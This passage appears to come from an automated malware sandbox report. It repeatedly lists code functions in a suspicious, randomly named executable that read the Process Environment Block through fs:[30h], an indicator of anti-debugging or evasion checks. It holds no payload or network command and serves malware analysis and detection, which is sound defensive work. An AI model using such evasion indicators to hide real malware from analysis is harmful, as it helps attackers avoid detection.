          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB273 mov eax, dword ptr fs:[00000030h]5_2_017FB273
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB273 mov eax, dword ptr fs:[00000030h]5_2_017FB273
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E289 mov eax, dword ptr fs:[00000030h]5_2_0187E289
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01807290 mov eax, dword ptr fs:[00000030h]5_2_01807290
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01807290 mov eax, dword ptr fs:[00000030h]5_2_01807290
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01807290 mov eax, dword ptr fs:[00000030h]5_2_01807290
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BF2AE mov eax, dword ptr fs:[00000030h]5_2_018BF2AE
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C92AB mov eax, dword ptr fs:[00000030h]5_2_018C92AB
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018242AF mov eax, dword ptr fs:[00000030h]5_2_018242AF
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018242AF mov eax, dword ptr fs:[00000030h]5_2_018242AF
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018DB2BC mov eax, dword ptr fs:[00000030h]5_2_018DB2BC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018DB2BC mov eax, dword ptr fs:[00000030h]5_2_018DB2BC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018DB2BC mov eax, dword ptr fs:[00000030h]5_2_018DB2BC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018DB2BC mov eax, dword ptr fs:[00000030h]5_2_018DB2BC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018332C0 mov eax, dword ptr fs:[00000030h]5_2_018332C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018332C0 mov eax, dword ptr fs:[00000030h]5_2_018332C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D32C9 mov eax, dword ptr fs:[00000030h]5_2_018D32C9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018232C5 mov eax, dword ptr fs:[00000030h]5_2_018232C5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180A2E0 mov eax, dword ptr fs:[00000030h]5_2_0180A2E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180A2E0 mov eax, dword ptr fs:[00000030h]5_2_0180A2E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180A2E0 mov eax, dword ptr fs:[00000030h]5_2_0180A2E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180A2E0 mov eax, dword ptr fs:[00000030h]5_2_0180A2E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180A2E0 mov eax, dword ptr fs:[00000030h]5_2_0180A2E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180A2E0 mov eax, dword ptr fs:[00000030h]5_2_0180A2E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018082E0 mov eax, dword ptr fs:[00000030h]5_2_018082E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018082E0 mov eax, dword ptr fs:[00000030h]5_2_018082E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018082E0 mov eax, dword ptr fs:[00000030h]5_2_018082E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018082E0 mov eax, dword ptr fs:[00000030h]5_2_018082E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F821B mov eax, dword ptr fs:[00000030h]5_2_017F821B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018102F9 mov eax, dword ptr fs:[00000030h]5_2_018102F9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018102F9 mov eax, dword ptr fs:[00000030h]5_2_018102F9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018102F9 mov eax, dword ptr fs:[00000030h]5_2_018102F9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018102F9 mov eax, dword ptr fs:[00000030h]5_2_018102F9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018102F9 mov eax, dword ptr fs:[00000030h]5_2_018102F9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018102F9 mov eax, dword ptr fs:[00000030h]5_2_018102F9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018102F9 mov eax, dword ptr fs:[00000030h]5_2_018102F9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018102F9 mov eax, dword ptr fs:[00000030h]5_2_018102F9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FA200 mov eax, dword ptr fs:[00000030h]5_2_017FA200
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FD2EC mov eax, dword ptr fs:[00000030h]5_2_017FD2EC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FD2EC mov eax, dword ptr fs:[00000030h]5_2_017FD2EC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188B214 mov eax, dword ptr fs:[00000030h]5_2_0188B214
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188B214 mov eax, dword ptr fs:[00000030h]5_2_0188B214
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F72E0 mov eax, dword ptr fs:[00000030h]5_2_017F72E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183A22B mov eax, dword ptr fs:[00000030h]5_2_0183A22B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183A22B mov eax, dword ptr fs:[00000030h]5_2_0183A22B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183A22B mov eax, dword ptr fs:[00000030h]5_2_0183A22B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01880227 mov eax, dword ptr fs:[00000030h]5_2_01880227
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01880227 mov eax, dword ptr fs:[00000030h]5_2_01880227
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01880227 mov eax, dword ptr fs:[00000030h]5_2_01880227
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01820230 mov ecx, dword ptr fs:[00000030h]5_2_01820230
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C124C mov eax, dword ptr fs:[00000030h]5_2_018C124C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C124C mov eax, dword ptr fs:[00000030h]5_2_018C124C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C124C mov eax, dword ptr fs:[00000030h]5_2_018C124C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C124C mov eax, dword ptr fs:[00000030h]5_2_018C124C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182F24A mov eax, dword ptr fs:[00000030h]5_2_0182F24A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BF247 mov eax, dword ptr fs:[00000030h]5_2_018BF247
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FC2B0 mov ecx, dword ptr fs:[00000030h]5_2_017FC2B0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F92AF mov eax, dword ptr fs:[00000030h]5_2_017F92AF
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187D250 mov eax, dword ptr fs:[00000030h]5_2_0187D250
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187D250 mov ecx, dword ptr fs:[00000030h]5_2_0187D250
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0189327E mov eax, dword ptr fs:[00000030h]5_2_0189327E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0189327E mov eax, dword ptr fs:[00000030h]5_2_0189327E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0189327E mov eax, dword ptr fs:[00000030h]5_2_0189327E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0189327E mov eax, dword ptr fs:[00000030h]5_2_0189327E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0189327E mov eax, dword ptr fs:[00000030h]5_2_0189327E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0189327E mov eax, dword ptr fs:[00000030h]5_2_0189327E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BD270 mov eax, dword ptr fs:[00000030h]5_2_018BD270
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183A580 mov eax, dword ptr fs:[00000030h]5_2_0183A580
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183A580 mov eax, dword ptr fs:[00000030h]5_2_0183A580
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01839580 mov eax, dword ptr fs:[00000030h]5_2_01839580
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01839580 mov eax, dword ptr fs:[00000030h]5_2_01839580
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BF582 mov eax, dword ptr fs:[00000030h]5_2_018BF582
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E588 mov eax, dword ptr fs:[00000030h]5_2_0187E588
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E588 mov eax, dword ptr fs:[00000030h]5_2_0187E588
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01832594 mov eax, dword ptr fs:[00000030h]5_2_01832594
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188C592 mov eax, dword ptr fs:[00000030h]5_2_0188C592
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018885AA mov eax, dword ptr fs:[00000030h]5_2_018885AA
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018045B0 mov eax, dword ptr fs:[00000030h]5_2_018045B0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018045B0 mov eax, dword ptr fs:[00000030h]5_2_018045B0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F753F mov eax, dword ptr fs:[00000030h]5_2_017F753F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F753F mov eax, dword ptr fs:[00000030h]5_2_017F753F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F753F mov eax, dword ptr fs:[00000030h]5_2_017F753F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183C5C6 mov eax, dword ptr fs:[00000030h]5_2_0183C5C6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018805C6 mov eax, dword ptr fs:[00000030h]5_2_018805C6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018365D0 mov eax, dword ptr fs:[00000030h]5_2_018365D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B5E0 mov eax, dword ptr fs:[00000030h]5_2_0180B5E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B5E0 mov eax, dword ptr fs:[00000030h]5_2_0180B5E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B5E0 mov eax, dword ptr fs:[00000030h]5_2_0180B5E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B5E0 mov eax, dword ptr fs:[00000030h]5_2_0180B5E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B5E0 mov eax, dword ptr fs:[00000030h]5_2_0180B5E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B5E0 mov eax, dword ptr fs:[00000030h]5_2_0180B5E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183A5E7 mov ebx, dword ptr fs:[00000030h]5_2_0183A5E7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0183A5E7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018315EF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0188C5FC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FB502 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01802500 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182E507 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0183C50D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0183C50D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018AF51B mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018AF51B mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018AF51B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0188C51D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01821514 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01821514 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01821514 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01821514 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01821514 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01821514 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0183F523 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01831527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0181252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0181252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0181252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0181252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0181252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0181252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0181252B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01803536 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01803536 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FF5C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FF5C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FF5C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FF5C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FF5C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FF5C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FF5C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FF5C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FF5C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01842539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01836540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01838540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0181E547 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0180254C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018DB55F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018DB55F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018CA553 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0181C560 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01800485 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0183648A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0183648A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0183648A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0183B490 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0183B490 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0188C490 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018024A2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018024A2 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0188D4A0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0188D4A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0188D4A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018344A8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0183E4BC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018214C9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018214C9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018214C9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018214C9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018214C9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182F4D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182F4D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182F4D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182F4D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182F4D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182F4D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182F4D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182F4D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0182F4D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018244D1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018244D1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017FB420 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018354E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0183E4EF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0183E4EF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018064F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_017F640D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0183A4F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0183A4F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018BF4FD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018294FA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_018BF409 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01896400 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01896400 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01889429 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01837425 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01837425 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0188F42F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0188F42F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0188F42F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0188F42F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_0188F42F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01810445 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe; Code function: 5_2_01810445 mov eax, dword ptr fs:[00000030h]
